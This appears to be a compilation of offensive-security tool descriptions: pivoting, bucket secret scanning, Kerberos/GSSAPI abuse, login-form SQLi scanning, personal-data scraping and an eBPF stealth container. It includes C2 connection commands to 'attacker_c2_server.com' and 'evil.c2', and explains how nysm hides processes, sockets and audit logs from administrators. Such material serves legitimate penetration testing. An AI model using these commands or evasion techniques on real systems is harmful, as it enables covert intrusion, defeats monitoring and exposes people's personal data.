    If you use Argus in your research, please cite our paper:

    @inproceedings{muralee2023Argus,
      title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
      author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck, A. Kapravelos, A. Machiry},
      booktitle={32nd USENIX Security Symposium (USENIX Security 23)},
      year={2023},
    }


    Nemesis - An Offensive Data Enrichment Pipeline

    By: Zion3R


    Nemesis is an offensive data enrichment pipeline and operator support system.

    Nemesis is built on Kubernetes with scale in mind; our goal was to create a centralized data processing platform that ingests data produced during offensive security assessments.

    Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


    Setup / Installation

    See the setup instructions.

    Contributing / Development Environment Setup

    See development.md

    Further Reading

    Post Name Publication Date Link
    Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
    Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
    On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6

    Acknowledgments

    Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!

    We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / access keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

    Features

    Secret Scanning

    Scans for over 80 unique regex signatures that can help uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
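
    As a rough sketch of how such a signature file is typically consumed (the actual schema of BucketLoot's regexes.json may differ; a flat name-to-pattern mapping is assumed here):

    import json
    import re

    # Assumed flat {"signature name": "pattern"} layout; the real regexes.json
    # schema (e.g. severity fields) may differ.
    def load_signatures(path: str) -> dict:
        with open(path, encoding="utf-8") as f:
            return {name: re.compile(p) for name, p in json.load(f).items()}

    def scan_text(signatures: dict, text: str) -> list:
        return [
            {"signature": name, "match": m.group(0)}
            for name, rx in signatures.items()
            for m in rx.finditer(text)
        ]

    sigs = load_signatures("regexes.json")
    print(scan_text(sigs, 'aws_key = "AKIAIOSFODNN7EXAMPLE"'))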

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with an 80+ unique regex signature list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from the response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

    By: Zion3R


    Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


    Features

    • Tun interface (No more SOCKS!)
    • Simple UI with agent selection and network information
    • Easy to use and setup
    • Automatic certificate configuration with Let's Encrypt
    • Performant (Multiplexing)
    • Does not require high privileges
    • Socket listening/binding on the agent
    • Multiple platforms supported for the agent

    How is this different from Ligolo/Chisel/Meterpreter... ?

    Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

    When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

    As an example, for a TCP connection:

    • SYN packets are translated to connect() on the remote host
    • A SYN-ACK is sent back if connect() succeeds
    • An RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED is returned after connect()
    • Nothing is sent on timeout

    This allows running tools like nmap without the use of proxychains (simpler and faster).
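
    That translation logic can be sketched in userland (an illustrative Python sketch only; Ligolo-ng implements this in Go on top of gVisor's netstack): map an incoming SYN to a connect() attempt and answer with the corresponding TCP control packet.

    import errno
    import socket

    def handle_syn(dst_ip: str, dst_port: int, timeout: float = 3.0) -> str:
        """Decide which TCP reply to synthesize for a tunneled SYN."""
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((dst_ip, dst_port))  # the SYN becomes a connect() on the remote side
            return "SYN-ACK"               # connect() succeeded
        except socket.timeout:
            return "DROP"                  # nothing is sent on timeout
        except OSError as e:
            if e.errno in (errno.ECONNRESET, errno.ECONNABORTED, errno.ECONNREFUSED):
                return "RST"               # refused/reset connections become an RST
            return "DROP"
        finally:
            s.close()

    print(handle_syn("127.0.0.1", 80))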

    Building & Usage

    Precompiled binaries

    Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

    Building Ligolo-ng

    Building ligolo-ng (Go >= 1.20 is required):

    $ go build -o agent cmd/agent/main.go
    $ go build -o proxy cmd/proxy/main.go
    # Build for Windows
    $ GOOS=windows go build -o agent.exe cmd/agent/main.go
    $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

    Setup Ligolo-ng

    Linux

    When using Linux, you need to create a tun interface on the Proxy Server (C2):

    $ sudo ip tuntap add user [your_username] mode tun ligolo
    $ sudo ip link set ligolo up

    Windows

    You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

    Running Ligolo-ng proxy server

    Start the proxy server on your Command and Control (C2) server (default port 11601):

    $ ./proxy -h # Help options
    $ ./proxy -autocert # Automatically request LetsEncrypt certificates

    TLS Options

    Using Let's Encrypt Autocert

    When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

    Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

    Using your own TLS certificates

    If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

    Automatic self-signed certificates (NOT RECOMMENDED)

    The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

    The -ignore-cert option needs to be used with the agent.

    Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

    Using Ligolo-ng

    Start the agent on your target (victim) computer (no privileges are required!):

    $ ./agent -connect attacker_c2_server.com:11601

    If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

    A session should appear on the proxy server.

    INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

    Use the session command to select the agent.

    ligolo-ng Β» session 
    ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

    Display the network configuration of the agent using the ifconfig command:

    [Agent : nchatelain@nworkstation] Β» ifconfig 
    [...]
    Interface 3
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚ Name         β”‚ wlp3s0                 β”‚
    β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe      β”‚
    β”‚ MTU          β”‚ 1500                   β”‚
    β”‚ Flags        β”‚ up|broadcast|multicast β”‚
    β”‚ IPv4 Address β”‚ 192.168.0.30/24        β”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

    Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

    Linux:

    $ sudo ip route add 192.168.0.0/24 dev ligolo

    Windows:

    > netsh int ipv4 show interfaces

    Idx MΓ©t MTU Γ‰tat Nom
    --- ---------- ---------- ------------ ---------------------------
    25 5 65535 connected ligolo

    > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

    Start the tunnel on the proxy:

    [Agent : nchatelain@nworkstation] Β» start
    [Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

    You can now access the 192.168.0.0/24 agent network from the proxy server.

    $ nmap 192.168.0.0/24 -v -sV -n
    [...]
    $ rdesktop 192.168.0.123
    [...]

    Agent Binding/Listening

    You can listen to ports on the agent and redirect connections to your control/proxy server.

    In a ligolo session, use the listener_add command.

    The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

    [Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
    INFO[1208] Listener created on remote agent!

    On the proxy:

    $ nc -lvp 4321

    When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

    This is very useful when using reverse tcp/udp payloads.

    You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

    [Agent : nchatelain@nworkstation] Β» listener_list 
    Active listeners
    β”Œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚ # β”‚ AGENT                   β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
    β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234           β”‚ 127.0.0.1:4321         β”‚
    β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

    [Agent : nchatelain@nworkstation] Β» listener_stop 0
    INFO[1505] Listener closed.

    Demo

    ligolo-ng_demo.mp4

    Does it require Administrator/root access ?

    On the agent side, no! Everything can be performed without administrative access.

    However, on your relay/proxy server, you need to be able to create a tun interface.

    Supported protocols/packets

    • TCP
    • UDP
    • ICMP (echo requests)

    Performance

    You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

    $ iperf3 -c 10.10.0.1 -p 24483
    Connecting to host 10.10.0.1, port 24483
    [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
    [ ID] Interval Transfer Bitrate Retr Cwnd
    [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
    [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
    [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
    [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
    [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
    [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
    [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
    [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
    [ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
    [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
    - - - - - - - - - - - - - - - - - - - - - - - - -
    [ ID] Interval Transfer Bitrate Retr
    [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
    [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

    Caveats

    Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

    When using nmap, you should use --unprivileged or -PE to avoid false positives.

    Todo

    • Implement other ICMP error messages (this will speed up UDP scans) ;
    • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
    • Add mTLS support.

    Credits

    • Nicolas Chatelain <nicolas -at- chatelain.me>


    Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

    By: Zion3R


    AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


    How to use

    • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
    • Install all dependencies by typing pip install -r requirements.txt.
    • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
    • Create a file named .openai-key and paste your chatgpt api key in there.
    • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
    • Create a file named β€˜domains.txt’. Type in a line-separated list of domains you’d like to scan.
    • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
    • Run antisquat using python3.8 antisquat.py domains.txt

    Examples:

    Let’s say you’d like to run antisquat on "flipkart.com".

    Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

    AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
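
    To picture what "generating permutations" can look like, here is a simplified stand-in (naive character omissions and swaps; AntiSquat's actual generation also uses NLP/LLM techniques and goes well beyond this):

    import socket

    def simple_permutations(domain: str) -> set:
        """Generate naive typosquat candidates: omissions and adjacent swaps."""
        name, _, tld = domain.rpartition(".")
        variants = set()
        for i in range(len(name)):
            variants.add(name[:i] + name[i + 1:])      # character omission
        for i in range(len(name) - 1):
            chars = list(name)
            chars[i], chars[i + 1] = chars[i + 1], chars[i]
            variants.add("".join(chars))               # adjacent transposition
        return {f"{v}.{tld}" for v in variants if v}

    for candidate in sorted(simple_permutations("flipkart.com")):
        try:
            print(f"{candidate} -> {socket.gethostbyname(candidate)}")  # registered names resolve
        except socket.gaierror:
            pass                                       # unregistered candidates are skipped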

    Test case:

    A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py

    Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

    If you'd like to know more about the tool, make sure to check out our blog.

    Acknowledgements

    To know more about our Attack Surface Management platform, check out NVADR.



    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various kinds of personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers, and usernames.
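
    The regex-driven extraction behind these categories can be pictured with a minimal sketch (the patterns and target URL are illustrative simplifications, not Uscrapper's exact expressions):

    import re
    import urllib.request

    EMAIL_RX = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
    PHONE_RX = re.compile(r"\+?\d[\d\s().-]{7,}\d")
    SOCIAL_RX = re.compile(r"https?://(?:www\.)?(?:twitter|linkedin|facebook|github)\.com/\S+")

    def extract_personal_data(url: str) -> dict:
        req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
        with urllib.request.urlopen(req) as resp:
            html = resp.read().decode("utf-8", errors="replace")
        return {
            "emails": sorted(set(EMAIL_RX.findall(html))),
            "phones": sorted(set(PHONE_RX.findall(html))),
            "social_links": sorted(set(SOCIAL_RX.findall(html))),
        }

    print(extract_personal_data("https://example.com"))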

    What's New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-web-scraping techniques.
    • Introduced Crawl and Scrape: an advanced crawl-and-scrape module to scrape websites from within.
    • Implemented multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

    By: Zion3R


    gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

    The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

    The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


    Prerequisites

    gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

    Windows

    On Windows hosts, the MIT Kerberos software should be installed in addition to the Python modules listed in requirements.txt; it can be obtained from the MIT Kerberos Distribution Page. On Windows, krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

    Linux

    The libkrb5-dev package needs to be installed prior to installing the Python requirements.

    All

    Once the requirements are satisfied, you can install the Python dependencies via the pip/pip3 tool:

    pip install -r requirements.txt

    Enumeration Mode

    The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

    Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.
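
    Conceptually, the LDAP half of that step boils down to a single filter (a minimal sketch using the ldap3 library, not gssapi-abuse's actual code; the connection details below are hypothetical, and the SSH GSSAPI probe is a separate step):

    from ldap3 import ALL, Connection, Server

    def find_non_windows_computers(dc, user, password, base_dn):
        """Search AD for computers whose operatingSystem does not contain 'Windows'."""
        server = Server(dc, get_info=ALL)
        conn = Connection(server, user=user, password=password, auto_bind=True)
        conn.search(
            base_dn,
            "(&(objectClass=computer)(!(operatingSystem=*Windows*)))",
            attributes=["dNSHostName", "operatingSystem"],
        )
        return [str(entry.dNSHostName) for entry in conn.entries]

    # Hypothetical connection details, for illustration only.
    print(find_non_windows_computers(
        "dc1.ad.ginge.com", "AD\\john.doe", "SuperSecret!", "DC=ad,DC=ginge,DC=com"
    ))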

    Example

    python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
    [=] Found 2 non Windows machines registered within AD
    [!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
    [+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

    DNS Mode

    DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.
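
    The underlying dnspython call pattern looks roughly like this (a sketch using a plain TSIG key for brevity; gssapi-abuse authenticates the same kind of update with GSS-TSIG over Kerberos instead, and the zone, server, and key material here are hypothetical):

    import dns.query
    import dns.tsigkeyring
    import dns.update

    # Hypothetical key material, for illustration only.
    keyring = dns.tsigkeyring.from_text({"demo-key.": "bXlzZWNyZXRrZXk="})

    update = dns.update.Update("ad.ginge.com", keyring=keyring)
    update.add("ahost", 300, "A", "192.168.128.50")   # add an A record for ahost

    response = dns.query.tcp(update, "192.168.128.1", timeout=10)
    print(response.rcode())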

    Examples

    Adding a DNS A record for host ahost.ad.ginge.com

    python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding A record for target ahost using data 192.168.128.50
    [+] Applied 1 updates successfully

    Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

    python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
    [+] Applied 1 updates successfully

    Forward and reverse DNS lookup results after execution

    nslookup ahost.ad.ginge.com
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50
    nslookup 192.168.128.50
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50


    Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

    By: Zion3R


    A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

    Features

    • Login panel scanning for multiple hosts
    • Proxy compatibility (HTTP, HTTPS)
    • Login panel scanning is done with multiprocessing,

    so the script is super fast at scanning many URLs

    A quick tutorial & screenshots are shown at the bottom.
    Project contribution tips are at the bottom.
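
    At its core, a login-panel detector can be sketched in a few lines: fetch a page and look for a password input (an illustrative sketch, not Logsensor's implementation; threads stand in here for the tool's multiprocessing, and the hosts are placeholders):

    import concurrent.futures
    import re
    import urllib.request

    LOGIN_HINT = re.compile(r'<input[^>]+type=["\']password["\']', re.IGNORECASE)

    def has_login_panel(url: str) -> bool:
        """Fetch a page and report whether it contains a password input field."""
        try:
            req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
            with urllib.request.urlopen(req, timeout=5) as resp:
                return bool(LOGIN_HINT.search(resp.read().decode("utf-8", "replace")))
        except OSError:
            return False

    # Hypothetical hosts; check many of them in parallel.
    urls = ["https://example.com/login", "https://example.org"]
    with concurrent.futures.ThreadPoolExecutor(max_workers=30) as pool:
        for url, found in zip(urls, pool.map(has_login_panel, urls)):
            print(f"{url}: {'login panel found' if found else 'nothing'}")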


    Installation

    git clone https://github.com/Mr-Robert0/Logsensor.git
    cd Logsensor && sudo chmod +x logsensor.py install.sh
    pip install -r requirements.txt
    ./install.sh

    Dependencies


    Quick Tutorial

    1. Multiple hosts scanning to detect login panels

    • You can increase the threads (default 30)
    • only run login detector module
    python3 logsensor.py -f <subdomains-list> 
    python3 logsensor.py -f <subdomains-list> -t 50
    python3 logsensor.py -f <subdomains-list> --login

    2. Targeted SQLi form scanning

    • Provide a specific login panel URL with the --sqli or -s flag to run only the SQLi form scanning module
    • Turn on the proxy to see the requests
    • Customize the username input field of the login panel with its actual name (default "username")
    python logsensor.py -u www.example.com/login --sqli 
    python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
    python logsensor.py -u www.example.com/login -s --inputname email

    View help

    python logsensor.py --help

    usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

    optional arguments:
    -u , --url Target URL (e.g. http://example.com/ )
    -f , --file Select a target hosts list file (e.g. list.txt )
    --proxy Proxy (e.g. http://127.0.0.1:8080)
    -l, --login run only Login panel Detector Module
    -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
    -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
    -t , --threads Number of threads (default 30)
    -h, --help Show this help message and exit

    Screenshots


    Development

    TODO

    1. adding "POST form SQli (Time based) scanning" and check for delay
    2. Fuzzing on Url Paths So as not to miss any login panel


    Nysm - A Stealth Post-Exploitation Container

    By: Zion3R


    A stealth post-exploitation container.

    Introduction

    With the rise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of system administrators, not only by hiding eBPF, but much more:

    • bpftool
    • bpflist-bpfcc
    • ps
    • top
    • sockstat
    • ss
    • rkhunter
    • chkrootkit
    • lsof
    • auditd
    • etc...

    All these tools go blind to what goes through nysm. It hides:

    • New eBPF programs
    • New eBPF maps
    • New eBPF links
    • New Auditd generated logs
    • New PIDs
    • New sockets

    Warning: This tool is a simple demonstration of eBPF capabilities and, as such, is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.


    Installation

    Requirements

    sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

    Linux headers

    cd ./nysm/src/
    bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

    Build

    cd ./nysm/src/
    make

    Usage

    nysm is a simple program to run before the intended command:

    Usage: nysm [OPTION...] COMMAND
    Stealth eBPF container.

    -d, --detach Run COMMAND in background
    -r, --rm Self destruct after execution
    -v, --verbose Produce verbose output
    -h, --help Display this help
    --usage Display a short usage message

    Examples

    Run a hidden bash:

    ./nysm bash

    Run a hidden ssh and remove ./nysm:

    ./nysm -r ssh user@domain

    Run a hidden socat as a daemon and remove ./nysm:

    ./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

    How it works

    In general

    As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

    To differentiate nysm events from the others, everything runs inside a separate PID namespace.

    Hide eBPF objects

    bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

    As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

    To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exits, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

    In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

    Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

    Hide Auditd logs

    Auditd receives its logs from recvfrom() which stores its messages in a buffer.

    If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header with 0.

    Hide PIDS

    Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

    As getdents64() requires looping through all its files, the eBPF instruction limit is easily reached. Therefore, nysm uses tail calls before reaching it.

    Hide sockets

    Hiding sockets is a big claim. In fact, opened sockets are already hidden from many tools, as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag, which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer, and the returned value is the length of all these messages combined.

    Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

    These are collected from the connect() and bind() calls.

    Limitations

    Even with the best effort, nysm still has some limitations.

    • Every tool that does not close its file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

    • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

    • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

